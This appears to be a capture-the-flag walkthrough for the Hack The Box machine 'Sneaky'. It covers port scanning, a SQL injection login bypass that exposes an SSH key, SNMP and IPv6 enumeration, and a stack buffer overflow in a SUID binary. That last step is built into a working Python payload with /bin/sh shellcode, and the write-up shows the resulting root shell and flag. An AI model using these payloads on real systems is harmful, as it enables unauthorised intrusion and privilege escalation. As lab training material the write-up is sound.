Masscan + Nmap
1
2
3
4
$ masscan -p1-65535,U:1-65535 `IP` --rate=10000 -e tun0 | tee masscan.out
Scanning 1 hosts [131070 ports/host]
Discovered open port 161/udp on 10.10.10.20
Discovered open port 80/tcp on 10.10.10.20
Parse those ports to nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
ports=$(cat masscan.out |awk '{ print $4 }' | sed 's/\/tcp//;s/\/udp//' | tr '\n' ',' | sed 's/,$//')
nmap -sVCTU --min-rate 1000 -p $ports `IP` -oN nmap-fullscan.out
PORT STATE SERVICE VERSION
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Under Development!
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: fcf2da02d0831859
| snmpEngineBoots: 8
|_ snmpEngineTime: 3m31s
| snmp-netstat:
| TCP 127.0.0.1:3306 0.0.0.0:0
|_ UDP 0.0.0.0:161 *:*
| snmp-processes:
| 1:
| Name: init
| Path: /sbin/init
| 407:
| Name: upstart-udev-br
| Path: upstart-udev-bridge
| Params: --daemon
| 411:
| Name: systemd-udevd
| Path: /lib/systemd/systemd-udevd
| Params: --daemon
| 470:
| Name: dbus-daemon
| Path: dbus-daemon
| Params: --system --fork
| 488:
| Name: systemd-logind
| Path: /lib/systemd/systemd-logind
| 492:
| Name: rsyslogd
| Path: rsyslogd
| 514:
| Name: upstart-file-br
| Path: upstart-file-bridge
| Params: --daemon
| 803:
| Name: upstart-socket-
| Path: upstart-socket-bridge
| Params: --daemon
| 947:
| Name: getty
| Path: /sbin/getty
| Params: -8 38400 tty4
| 992:
| Name: sshd
| Path: /usr/sbin/sshd
| Params: -D
| 995:
| Name: cron
| Path: cron
| 996:
| Name: acpid
| Path: acpid
| Params: -c /etc/acpi/events -s /var/run/acpid.socket
| 1059:
| Name: mysqld
| Path: /usr/sbin/mysqld
| 1072:
| Name: snmpd
| Path: /usr/sbin/snmpd
| Params: -Lsd -Lf /dev/null -u snmp -g snmp -I -smux mteTrigger mteTriggerConf -p /var/run/snmpd.pid
Service Info: Host: Sneaky
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.20 seconds
HTTP
Directory bruteforcing:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
ffuf -u http://10.10.10.20/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -fc 401,403,405 -e .txt,.php,.zip,.bak,.html
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.10.20/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
:: Extensions : .txt .php .zip .bak .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 401,403,405
________________________________________________
index.html [Status: 200, Size: 183, Words: 10, Lines: 12]
dev [Status: 301, Size: 307, Words: 20, Lines: 10]
. [Status: 200, Size: 183, Words: 10, Lines: 12]
:: Progress: [378522/378522] :: Job [1/1] :: 431 req/sec :: Duration: [0:14:29] :: Errors: 0 ::
Visiting /dev gives a login form. Tried common usernames and passwords, didn’t work. Let’s try for SQL injection: I tried ' or 1=1-- - payload for password field and it logged in! Page has this content:
1
2
3
4
5
6
7
8
9
DevWebsite Login
name: admin
name: thrasivoulos
My Key
Noone is ever gonna find this key :P
And that My Key links to /dev/sshkeyforadministratordifficulttimes which contains private ssh key for thrasivoulos.
SNMP
Simple Network Management Protocol is a protocol used for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. Brute forcing the community string with one-sixty-one:
1
2
3
4
$ onesixtyone -c /opt/metasploit-framework/embedded/framework/data/wordlists/snmp_default_pass.txt `IP`
Scanning 1 hosts, 123 communities
10.10.10.20 [public] Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686
10.10.10.20 [public] Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686
Dumping SNMP-data:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
$ snmp-check -p 161 `IP` -c public -d -v 3
[*] System information:
Host IP address : 10.10.10.20
Hostname : Sneaky
Description : Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686
Contact : root
Location : Unknown
Uptime snmp : 00:18:48.47
Uptime system : 00:18:43.51
System date : 2021-7-21 16:29:17.0
[*] Processes:
Id Status Name Path Parameters
1 runnable init /sbin/init
992 runnable sshd /usr/sbin/sshd -D
1059 runnable mysqld /usr/sbin/mysqld
[*] Software components:
Index Name
0 accountsservice-0.6.35-0ubuntu7.3
1 acpid-1:2.0.21-1ubuntu2
8 apport-symptoms-0.20
9 apt-1.0.1ubuntu2.17
10 apt-transport-https-1.0.1ubuntu2.17
383 passwd-1:4.1.5.1-1ubuntu9.4
384 patch-2.7.1-4ubuntu2.3
392 php5-json-1.3.2-2build1
456 ssl-cert-1.0.33
457 strace-4.8-1ubuntu5
458 sudo-1.8.9p5-1ubuntu1.3
467 tcpdump-4.9.0-1ubuntu1~ubuntu14.04.1
468 telnet-0.17-36build2
469 time-1.7-24
470 tmux-1.8-5
471 tzdata-2016j-0ubuntu0.14.04
476 ucf-3.0027+nmu1
477 udev-204-5ubuntu20.24
478 ufw-0.34~rc-0ubuntu2
487 vim-common-2:7.4.052-1ubuntu3.1
488 vim-runtime-2:7.4.052-1ubuntu3.1
489 vim-tiny-2:7.4.052-1ubuntu3.1
490 w3m-0.5.3-15ubuntu0.1
491 wget-1.15-1ubuntu1.14.04.2
I can see MySQL running in the background.
We can even use snmpwalk for more data with snmpwalk -c public -v2c IP. But that shows tree structure output, which is weird to understand. To prevent that, use apt install snmp-mibs-downloader, then edit /etc/snmp/snmp.conf and comment the mibs line.
1
$ snmpwalk -c public -v2c `IP` > snmpwalk-v2c
Finding IPV6
After checking out the data from snmp, I do get some IPv6 addresses:
1
2
3
4
$ cat snmpwalk-v2c | grep -i ipv6 | grep 'fe:80\|de:ad' | awk -F '"' '{print $2 }'| sort -u
de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:44:ec
fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:44:ec
fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:83:d8
But the formatting for ipv6 address is still wrong. They should be:
1
2
3
dead:beef:0000:0000:0250:56ff:feb9:44ec
fe80:0000:0000:0000:0250:56ff:feb9:44ec
fe80:0000:0000:0000:0250:56ff:feb9:83d8
Running nmap on all the IPv6 addresses for port 22:
1
2
3
4
5
6
7
8
9
$ for i in $(cat ipv6); do nmap -6 $i -Pn -n -p 22 ; done
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 17:05 IST
Nmap scan report for dead:beef::250:56ff:feb9:44ec
Host is up (0.088s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (0 hosts up) scanned in 1.53 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ ssh -i ./sshkeyforadministratordifficulttimes thrasivoulos@dead:beef::250:56ff:feb9:44ec
The authenticity of host 'dead:beef::250:56ff:feb9:44ec (dead:beef::250:56ff:feb9:44ec)' can't be established.
ECDSA key fingerprint is SHA256:KCwXgk+ryPhJU+UhxyHAO16VCRFrty3aLPWPSkq/E2o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'dead:beef::250:56ff:feb9:44ec' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-75-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Wed Jul 21 16:10:30 EEST 2021
System load: 0.0 Memory usage: 4% Processes: 176
Usage of /: 9.9% of 18.58GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
https://landscape.canonical.com/
Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Sun May 14 20:22:53 2017 from dead:beef:1::1077
thrasivoulos@Sneaky:~$
Privesc using BOF
Checking for SUID perms, I get /usr/local/bin/chal:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ find / -type f -perm -4000 2>/dev/null
/bin/umount
/bin/su
/bin/mount
/bin/ping6
/bin/fusermount
/bin/ping
/usr/local/bin/chal
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/at
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
This binary is vulnerable to buffer-overflow.
1
2
3
4
5
thrasivoulos@Sneaky:~$ /usr/local/bin/chal
Segmentation fault (core dumped)
thrasivoulos@Sneaky:~$ strings /usr/local/bin/chal | grep strcpy
strcpy
strcpy@@GLIBC_2.0
Checking Protections
It’s turned off:
1
2
thrasivoulos@Sneaky:~$ cat /proc/sys/kernel/randomize_va_space
0
No protections enabled:
1
2
3
4
5
6
7
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : Partial
gdb-peda$
Enumerating chal
Listing functions:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
gdb-peda$ info functions
All defined functions:
Non-debugging symbols:
0x080482b4 _init
0x080482f0 strcpy@plt
0x08048300 __gmon_start__@plt
0x08048310 __libc_start_main@plt
0x08048320 _start
0x08048350 __x86.get_pc_thunk.bx
0x08048360 deregister_tm_clones
0x08048390 register_tm_clones
0x080483d0 __do_global_dtors_aux
0x080483f0 frame_dummy
0x0804841d main
0x08048450 __libc_csu_init
0x080484c0 __libc_csu_fini
0x080484c4 _fini
Disassembling main, Nothing fancy.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
gdb-peda$ disass main
Dump of assembler code for function main:
0x0804841d <+0>: push ebp
0x0804841e <+1>: mov ebp,esp
0x08048420 <+3>: and esp,0xfffffff0
0x08048423 <+6>: sub esp,0x170
0x08048429 <+12>: mov eax,DWORD PTR [ebp+0xc]
0x0804842c <+15>: add eax,0x4
0x0804842f <+18>: mov eax,DWORD PTR [eax]
0x08048431 <+20>: mov DWORD PTR [esp+0x4],eax
0x08048435 <+24>: lea eax,[esp+0x12]
0x08048439 <+28>: mov DWORD PTR [esp],eax
0x0804843c <+31>: call 0x80482f0 <strcpy@plt>
0x08048441 <+36>: mov eax,0x0
0x08048446 <+41>: leave
0x08048447 <+42>: ret
End of assembler dump.
Also this binary copies given command-line argument to a variable.
Finding offset
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
gdb-peda$ pattern create 500
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
gdb-peda$ r 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
Starting program: /root/HTB/Sneaky/privesc/chal 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd400 ("sgAs6A")
EDX: 0xffffd030 ("sgAs6A")
ESI: 0xf7fa1000 --> 0x1e4d6c
EDI: 0xf7fa1000 --> 0x1e4d6c
EBP: 0x41712541 ('A%qA')
ESP: 0xffffcfb0 ("rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A")
EIP: 0x25415525 ('%UA%')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
Stopped reason: SIGSEGV
0x25415525 in ?? ()
Offset comes as 362 for EIP.
1
2
3
4
gdb-peda$ pattern search $eip
Registers contain pattern buffer:
EBP+0 found at offset: 358
EIP+0 found at offset: 362
Confirming the offset
Sending 362 A’s and 4 B’s and watching if they end up on EIP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
gdb-peda$ r $(python3 -c 'print("A"*362 + "B"*4)')
Starting program: /root/HTB/Sneaky/privesc/chal $(python3 -c 'print("A"*362 + "B"*4)')
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd400 ("AABBBB")
EDX: 0xffffd02a ("AABBBB")
ESI: 0xf7fa1000 --> 0x1e4d6c
EDI: 0xf7fa1000 --> 0x1e4d6c
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd030 --> 0x0
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
Getting /bin/sh shellcode
Getting /bin/sh shellcode for x86, as it’s a 32bit binary. Googling: /bin/sh shellcode x86 28 bytes: packetstorm
Getting eip address
I’ll send 400 bytes of B’s and see where in the stack they end up.
1
2
3
4
(gdb) r $(python3 -c 'print("B"*400)')
Starting program: /usr/local/bin/chal $(python3 -c 'print("B"*400)')
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
Running x/100x $esp shows some B’s which are nothing as compared to 400 we sent. Trying to see 400 bytes behind esp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
(gdb) x/100x $esp-400
0xbffff3b0: 0xbffff3d2 0x00000000 0x00000000 0x08048441
0xbffff3c0: 0xbffff3d2 0xbffff712 0x0804821d 0xb7fffc24
0xbffff3d0: 0x424218fc 0x42424242 0x42424242 0x42424242
0xbffff3e0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff3f0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff400: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff410: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff420: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff430: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff440: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff450: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff460: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff470: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff480: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff490: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff4a0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff4b0: 0x42424242 0x42424242 0x42424242 0x42424242
We can any address of these which shows 0x42 or B, as we’ll send NOPS to the rest of the stack. I chose 0xbffff3f0 for eip.
Exploitation
What I’m trying to do here is send my shellcode in the stack, then point eip to exact that address or above that address. (It doesn’t matter if our address is a bit off, it’ll try to run NOPS, then our shellcode.) Payload looks something like this: NOPS + SHELLCODE + EIP
1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/python3
import sys
offset = 362
shellcode = b"\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
nopsled=b"\x90" *(offset - len(shellcode))
#eip 0xbffff3f0
eip=b"\xf0\xf3\xff\xbf"
payload = nopsled + shellcode + eip
sys.stdout.buffer.write(payload)
But this payload didn’t work and that can be because of a long shellcode. I tried to find check why this doesn’t work and it seems like the nopsled breaks in between:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
(gdb) x/100x $esp-300
0xbffff444: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff454: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff464: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff474: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff484: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff494: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4a4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4b4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4c4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4d4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4e4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4f4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff504: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff514: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff524: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff534: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff544: 0x90909090 0x90909090 0x90909090 0x6850c031
0xbffff554: 0x68732f2f 0x69622f68 0x89e3896e 0xb0c289c1
0xbffff564: 0x3180cd0b 0x80cd40c0 0xbffff3f0 0x00000000
0xbffff574: 0xbffff604 0xbffff610 0xb7feccca 0x00000002
0xbffff584: 0xbffff604 0xbffff5a4 0x0804a014 0x0804821c
0xbffff594: 0xb7fce000 0x00000000 0x00000000 0x00000000
0xbffff5a4: 0x4c7a61ee 0x74e5e5fe 0x00000000 0x00000000
0xbffff5b4: 0x00000000 0x00000002 0x08048320 0x00000000
0xbffff5c4: 0xb7ff24c0 0xb7e3ba09 0xb7fff000 0x00000002
Finding where nopslead continues later on, it gave me 0xbffff74c:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
(gdb) x/100x $esp+300
0xbffff69c: 0x00000020 0x00000005 0x00000009 0x00000007
0xbffff6ac: 0xb7fde000 0x00000008 0x00000000 0x00000009
0xbffff6bc: 0x08048320 0x0000000b 0x000003e8 0x0000000c
0xbffff6cc: 0x000003e8 0x0000000d 0x000003e8 0x0000000e
0xbffff6dc: 0x000003e8 0x00000017 0x00000001 0x00000019
0xbffff6ec: 0xbffff70b 0x0000001f 0xbfffffe8 0x0000000f
0xbffff6fc: 0xbffff71b 0x00000000 0x00000000 0xbf000000
0xbffff70c: 0x40d50dab 0x8448d9c8 0xbf0b9c5f 0x692fa6f5
0xbffff71c: 0x00363836 0x7273752f 0x636f6c2f 0x622f6c61
0xbffff72c: 0x632f6e69 0x006c6168 0x90909090 0x90909090
0xbffff73c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff74c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff75c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff76c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff77c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff78c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff79c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff7ac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff7bc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff7cc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff7dc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff7ec: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff7fc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff80c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff81c: 0x90909090 0x90909090 0x90909090 0x90909090
Final exploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/python
import sys
offset = 362
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73"
shellcode+= b"\x68\x68\x2f\x62\x69\x6e\x89"
shellcode+= b"\xe3\x89\xc1\x89\xc2\xb0\x0b"
shellcode+= b"\xcd\x80\x31\xc0\x40\xcd\x80"
nopsled=b"\x90" *(offset - len(shellcode))
# eip 0xbffff750
eip=b"\x4c\xf7\xff\xbf"
payload = nopsled + shellcode + eip
sys.stdout.buffer.write(payload)
Running the exploit:
1
2
3
4
5
thrasivoulos@Sneaky:~$ /usr/local/bin/chal `python3 script.py `
# whoami
root
# cat /root/root.txt
c5153d86cb175a9d5d9a5cc81736fb33